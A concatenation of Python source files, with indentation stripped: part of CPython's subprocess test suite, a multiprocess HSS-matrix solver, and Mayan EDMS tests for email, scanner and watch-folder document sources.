# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
support.wait_process(proc.pid, exitcode=0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
support.wait_process(proc.pid, exitcode=0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
# Don't check the returncode value: the test reads the exit status,
# so Popen failed to read it and uses a default returncode instead.
self.assertIsNotNone(proc.returncode)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with warnings_helper.check_warnings((".*overriding close_fds",
RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp", "fcntl"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
fast_solver_utils.py
|
import gauss
import log
import tools
import numpy as np
import functools
import operator
from multiprocessing import SimpleQueue, Process
__all__ = ['solve']
def func(i, obj, b_i, A, q):
if obj.U.shape[0] > obj.U.shape[1]:
q_i, tmpU = tools.ql(obj.get_U())
n_i = tmpU.shape[1]
new_U = tools.get_block(tmpU, [i for i in range(tmpU.shape[1] - n_i, tmpU.shape[1])],
[j for j in range(n_i)])
s = np.array(b_i).reshape((len(b_i), 1))
c = np.transpose(q_i)
t = c @ s
beta = t[:len(t) - n_i]
#gamma = t[len(t) - n_i:]
t = np.transpose(q_i) @ obj.get_D(A)
tmpD, w_i = tools.lq(t)
new_D = tools.get_block(tmpD, [i for i in range(tmpD.shape[0] - n_i, tmpD.shape[0])],
[j for j in range(tmpD.shape[0] - n_i, tmpD.shape[0])])
tmpV = w_i @ obj.get_V()
new_V = tools.get_block(tmpV, [i for i in range(tmpV.shape[0] - n_i, tmpD.shape[0])],
[j for j in range(tmpV.shape[1])])
o = tools.get_block(tmpD, [i for i in range(tmpD.shape[0] - n_i)],
[j for j in range(tmpD.shape[0] - n_i)])
z_i = gauss.gauss(o, beta)
z_i = list(z_i)
else:
if log.is_debug():
log.debug('incompressible rows')
tmpD = obj.get_D(A)
tmpU = obj.get_U()
tmpV = obj.get_V()
new_D = obj.get_D(A)
new_U = obj.get_U()
new_V = obj.get_V()
n_i = obj.get_U().shape[0]
z_i = []
q_i = np.identity(obj.get_D(A).shape[0])
w_i = np.identity(obj.get_D(A).shape[1])
res = [tmpD, tmpU, tmpV, new_D, new_U, new_V, (z_i, n_i), np.transpose(q_i), np.transpose(w_i)]
q.put((i, res))
def batch_func(args):
for arg in args:
func(*arg)
def solve(hss, b, processes_count=1):
if hss.Partition.max_level == 1:
assert len(hss.Partition.level_to_nodes[1]) == 1
tmp = hss.Partition.level_to_nodes[1][0].get_D(hss.A)
b = np.array(b).reshape((len(b), 1))
return gauss.gauss(tmp, b)
no_compressible_blocks = all([obj.U.shape[0] <= obj.U.shape[1] for obj in hss.Partition.level_to_nodes[hss.Partition.max_level]])
if no_compressible_blocks:
if log.is_debug():
log.debug('No compressible blocks')
tmp = hss.duplicate()
tmp.remove_last_level()
s = b
return solve(tmp, s)
else:
if log.is_debug():
log.debug('Compressible blocks')
res = {}
queue = SimpleQueue()
start_index = 0
args = {}
tasks_count = len(hss.Partition.level_to_nodes[hss.Partition.max_level])
for k in range(0, tasks_count):
index = k % processes_count
obj = hss.Partition.level_to_nodes[hss.Partition.max_level][k]
b_i = b[start_index:start_index + obj.U.shape[0]]
start_index += obj.U.shape[0]
args[index] = args.get(index, []) + [(k, obj, b_i, hss.A, queue)]
processes = []
for key in args.keys():
p = Process(target=batch_func, args=(args[key],))
p.Daemon = True
p.start()
processes.append(p)
for _ in range(tasks_count):
pair = queue.get()
res[pair[0]] = pair[1]
tmpDs = [res[i][0] for i in range(0, tasks_count)]
tmpUs = [res[i][1] for i in range(0, tasks_count)]
tmpVs = [res[i][2] for i in range(0, tasks_count)]
newDs = [res[i][3] for i in range(0, tasks_count)]
newUs = [res[i][4] for i in range(0, tasks_count)]
newVs = [res[i][5] for i in range(0, tasks_count)]
z = [res[i][6] for i in range(0, tasks_count)]
q_is = [res[i][7] for i in range(0, tasks_count)]
w_is = [res[i][8] for i in range(0, tasks_count)]
tmp_HSS = hss.duplicate()
tmp_HSS.set_last_level_matrices(tmpUs, tmpVs, tmpDs)
z_zeroed = functools.reduce(operator.add, [list(z_[0]) + [0] * z_[1] for z_ in z])
z_zeroed = np.array(z_zeroed).reshape(len(z_zeroed), 1)
b = np.array(b).reshape((len(b), 1))
b_unitary = tools.diag(q_is) @ b
assert len(z_zeroed) == len(b)
b_tmp = tmp_HSS.fast_multiply(z_zeroed, processes_count=processes_count)
b_tmp = b_tmp.reshape((b_tmp.shape[0], 1))
b_ = b_unitary - b_tmp
new_b = []
i = 0
for obj in z:
i += len(obj[0])
j = 0
while j < obj[1]:
new_b.append([b_[i]])
i += 1
j += 1
new_HSS = hss.duplicate()
new_HSS.set_last_level_matrices(newUs, newVs, newDs)
tmp_x = solve(new_HSS, new_b)
i = 0
tmp3 = []
for z_ in z:
tmp3 += list(z_[0]) + list(tmp_x[i:i + z_[1]])
i += z_[1]
return tools.diag(w_is) @ tmp3
|
test_models.py
|
import fcntl
from multiprocessing import Process
from pathlib import Path
import shutil
import mock
from django.core import mail
from django.utils.encoding import force_bytes, force_text
from django_celery_beat.models import PeriodicTask
from mayan.apps.common.serialization import yaml_dump
from mayan.apps.documents.models import Document
from mayan.apps.documents.storages import storage_document_versions
from mayan.apps.documents.tests.base import GenericDocumentTestCase
from mayan.apps.documents.tests.literals import (
TEST_COMPRESSED_DOCUMENT_PATH, TEST_NON_ASCII_DOCUMENT_FILENAME,
TEST_NON_ASCII_DOCUMENT_PATH, TEST_NON_ASCII_COMPRESSED_DOCUMENT_PATH,
TEST_SMALL_DOCUMENT_FILENAME, TEST_SMALL_DOCUMENT_PATH
)
from mayan.apps.metadata.models import MetadataType
from ..literals import SOURCE_UNCOMPRESS_CHOICE_Y
from ..models.email_sources import EmailBaseModel, IMAPEmail, POP3Email
from ..models.scanner_sources import SaneScanner
from .literals import (
TEST_EMAIL_ATTACHMENT_AND_INLINE, TEST_EMAIL_BASE64_FILENAME,
TEST_EMAIL_BASE64_FILENAME_FROM, TEST_EMAIL_BASE64_FILENAME_SUBJECT,
TEST_EMAIL_INLINE_IMAGE, TEST_EMAIL_NO_CONTENT_TYPE,
TEST_EMAIL_NO_CONTENT_TYPE_STRING, TEST_EMAIL_ZERO_LENGTH_ATTACHMENT,
TEST_WATCHFOLDER_SUBFOLDER
)
from .mixins import SourceTestMixin, WatchFolderTestMixin
from .mocks import MockIMAPServer, MockPOP3Mailbox
class CompressedUploadsTestCase(SourceTestMixin, GenericDocumentTestCase):
auto_upload_test_document = False
def test_upload_compressed_file(self):
self.test_source.uncompress = SOURCE_UNCOMPRESS_CHOICE_Y
self.test_source.save()
with open(file=TEST_COMPRESSED_DOCUMENT_PATH, mode='rb') as file_object:
self.test_source.handle_upload(
document_type=self.test_document_type,
file_object=file_object,
expand=(
self.test_source.uncompress == SOURCE_UNCOMPRESS_CHOICE_Y
)
)
self.assertEqual(Document.objects.count(), 2)
self.assertTrue(
'first document.pdf' in Document.objects.values_list(
'label', flat=True
)
)
self.assertTrue(
'second document.pdf' in Document.objects.values_list(
'label', flat=True
)
)
class EmailBaseTestCase(GenericDocumentTestCase):
auto_upload_test_document = False
def _create_email_source(self):
self.source = EmailBaseModel(
document_type=self.test_document_type,
host='', username='', password='', store_body=True
)
def test_decode_email_base64_encoded_filename(self):
"""
Test decoding of base64 encoded e-mail attachment filename.
"""
self._create_email_source()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_BASE64_FILENAME
)
self.assertEqual(
Document.objects.first().label, 'Ampelm\xe4nnchen.txt'
)
def test_decode_email_no_content_type(self):
self._create_email_source()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_NO_CONTENT_TYPE
)
self.assertTrue(
TEST_EMAIL_NO_CONTENT_TYPE_STRING in Document.objects.first().open().read()
)
def test_decode_email_zero_length_attachment(self):
self._create_email_source()
self.source.store_body = False
self.source.save()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_ZERO_LENGTH_ATTACHMENT
)
self.assertEqual(Document.objects.count(), 0)
def test_decode_email_with_inline_image(self):
# Silence expected errors in other apps
self._silence_logger(name='mayan.apps.converter.backends')
self._create_email_source()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_INLINE_IMAGE
)
self.assertTrue(Document.objects.count(), 2)
self.assertQuerysetEqual(
ordered=False, qs=Document.objects.all(), values=(
'<Document: test-01.png>', '<Document: email_body.html>'
),
)
def test_decode_email_with_attachment_and_inline_image(self):
# Silence expected errors in other apps
self._silence_logger(name='mayan.apps.converter.backends')
self._create_email_source()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_ATTACHMENT_AND_INLINE
)
self.assertTrue(Document.objects.count(), 2)
self.assertQuerysetEqual(
ordered=False, qs=Document.objects.all(), values=(
'<Document: test-01.png>', '<Document: email_body.html>',
),
)
def test_decode_email_and_store_from_and_subject_as_metadata(self):
metadata_from = MetadataType.objects.create(name='from')
metadata_subject = MetadataType.objects.create(name='subject')
self.test_document_type.metadata.create(metadata_type=metadata_from)
self.test_document_type.metadata.create(metadata_type=metadata_subject)
self._create_email_source()
self.source.from_metadata_type = metadata_from
self.source.subject_metadata_type = metadata_subject
self.source.save()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_BASE64_FILENAME
)
document = Document.objects.first()
self.assertEqual(
document.label, 'Ampelm\xe4nnchen.txt'
)
self.assertEqual(
document.metadata.get(metadata_type=metadata_from).value,
TEST_EMAIL_BASE64_FILENAME_FROM
)
self.assertEqual(
document.metadata.get(metadata_type=metadata_subject).value,
TEST_EMAIL_BASE64_FILENAME_SUBJECT
)
def test_document_upload_no_body(self):
# Silence expected errors in other apps
self._silence_logger(name='mayan.apps.converter.backends')
self._create_email_source()
self.source.store_body = False
self.source.save()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_ATTACHMENT_AND_INLINE
)
# Only two attachments, no body document
self.assertEqual(1, Document.objects.count())
def test_document_upload_with_body(self):
# Silence expected errors in other apps
self._silence_logger(name='mayan.apps.converter.backends')
self._create_email_source()
EmailBaseModel.process_message(
source=self.source, message_text=TEST_EMAIL_ATTACHMENT_AND_INLINE
)
# Only two attachments and a body document
self.assertEqual(2, Document.objects.count())
def test_metadata_yaml_attachment(self):
TEST_METADATA_VALUE_1 = 'test value 1'
TEST_METADATA_VALUE_2 = 'test value 2'
test_metadata_type_1 = MetadataType.objects.create(
name='test_metadata_type_1'
)
test_metadata_type_2 = MetadataType.objects.create(
name='test_metadata_type_2'
)
self.test_document_type.metadata.create(
metadata_type=test_metadata_type_1
)
self.test_document_type.metadata.create(
metadata_type=test_metadata_type_2
)
test_metadata_yaml = yaml_dump(
data={
test_metadata_type_1.name: TEST_METADATA_VALUE_1,
test_metadata_type_2.name: TEST_METADATA_VALUE_2,
}
)
# Create email with a test attachment first, then the metadata.yaml
# attachment
with mail.get_connection(
backend='django.core.mail.backends.locmem.EmailBackend'
) as connection:
email_message = mail.EmailMultiAlternatives(
body='test email body', connection=connection,
subject='test email subject', to=['test@example.com'],
)
email_message.attach(
filename='test_attachment',
content='test_content',
)
email_message.attach(
filename='metadata.yaml',
content=test_metadata_yaml,
)
email_message.send()
self._create_email_source()
self.source.store_body = True
self.source.save()
EmailBaseModel.process_message(
source=self.source, message_text=mail.outbox[0].message()
)
self.assertEqual(Document.objects.count(), 2)
for document in Document.objects.all():
self.assertEqual(
document.metadata.get(metadata_type=test_metadata_type_1).value,
TEST_METADATA_VALUE_1
)
self.assertEqual(
document.metadata.get(metadata_type=test_metadata_type_2).value,
TEST_METADATA_VALUE_2
)
class IMAPSourceTestCase(GenericDocumentTestCase):
auto_upload_test_document = False
@mock.patch('imaplib.IMAP4_SSL', autospec=True)
def test_download_document(self, mock_imaplib):
mock_imaplib.return_value = MockIMAPServer()
self.source = IMAPEmail.objects.create(
document_type=self.test_document_type, label='', host='',
password='', username=''
)
self.source.check_source()
self.assertEqual(
Document.objects.first().label, 'Ampelm\xe4nnchen.txt'
)
class IntervalSourceTestCase(WatchFolderTestMixin, GenericDocumentTestCase):
auto_upload_test_document = False
def test_periodic_task_create(self):
periodic_task_count = PeriodicTask.objects.count()
self._create_test_watchfolder()
self.assertTrue(PeriodicTask.objects.count() > periodic_task_count)
def test_periodic_task_delete(self):
self._create_test_watchfolder()
periodic_task_count = PeriodicTask.objects.count()
self.test_document_type.delete()
self.assertTrue(PeriodicTask.objects.count() < periodic_task_count)
class POP3SourceTestCase(GenericDocumentTestCase):
auto_upload_test_document = False
@mock.patch('poplib.POP3_SSL', autospec=True)
def test_download_document(self, mock_poplib):
mock_poplib.return_value = MockPOP3Mailbox()
self.source = POP3Email.objects.create(
document_type=self.test_document_type, label='', host='',
password='', username=''
)
self.source.check_source()
self.assertEqual(
Document.objects.first().label, 'Ampelm\xe4nnchen.txt'
)
class SANESourceTestCase(GenericDocumentTestCase):
auto_upload_test_document = False
def _create_test_scanner_source(self):
self.test_source = SaneScanner.objects.create(
label='', device_name='test'
)
def test_command(self):
self._create_test_scanner_source()
file_object = self.test_source.execute_command(arguments=('-V',))
self.assertTrue(force_bytes('sane') in file_object.read())
def test_scan(self):
self._create_test_scanner_source()
file_object = self.test_source.get_upload_file_object(
form_data={'document_type': self.test_document_type.pk}
)
self.assertTrue(file_object.size > 0)
class WatchFolderTestCase(WatchFolderTestMixin, GenericDocumentTestCase):
auto_upload_test_document = False
def test_subfolder_support_disabled(self):
self._create_test_watchfolder()
test_path = Path(self.temporary_directory)
test_subfolder = test_path.joinpath(TEST_WATCHFOLDER_SUBFOLDER)
test_subfolder.mkdir()
shutil.copy(
src=TEST_SMALL_DOCUMENT_PATH, dst=force_text(s=test_subfolder)
)
self.test_watch_folder.check_source()
self.assertEqual(Document.objects.count(), 0)
def test_subfolder_support_enabled(self):
self._create_test_watchfolder()
self.test_watch_folder.include_subdirectories = True
self.test_watch_folder.save()
test_path = Path(self.temporary_directory)
test_subfolder = test_path.joinpath(TEST_WATCHFOLDER_SUBFOLDER)
test_subfolder.mkdir()
shutil.copy(
src=TEST_SMALL_DOCUMENT_PATH, dst=force_text(s=test_subfolder)
)
self.test_watch_folder.check_source()
self.assertEqual(Document.objects.count(), 1)
document = Document.objects.first()
self.assertEqual(document.exists(), True)
self.assertEqual(document.size, 17436)
